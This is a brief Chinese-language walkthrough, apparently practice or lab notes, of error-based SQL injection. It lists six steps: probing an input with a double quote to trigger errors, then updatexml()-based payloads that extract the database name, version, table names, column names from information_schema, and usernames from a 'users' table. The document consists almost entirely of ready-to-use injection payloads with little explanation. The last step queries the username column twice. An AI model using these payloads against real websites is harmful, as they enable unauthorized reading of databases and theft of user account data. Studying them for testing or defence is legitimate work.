1、测试注入点
1"
输入1"发现有报错信息,可以进行报错注入
2、查看当前数据库
1" and updatexml(1,concat(0x3a,database()),1)
3、查看当前数据库版本
1" and updatexml(1,concat(0x3a,version()),1) --+
4、爆表
1" and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) --+
5、爆字段名
1" and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1)),1) --+
6、查询数据库内容
1" and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a,(select username from users limit 0,1)),1) --+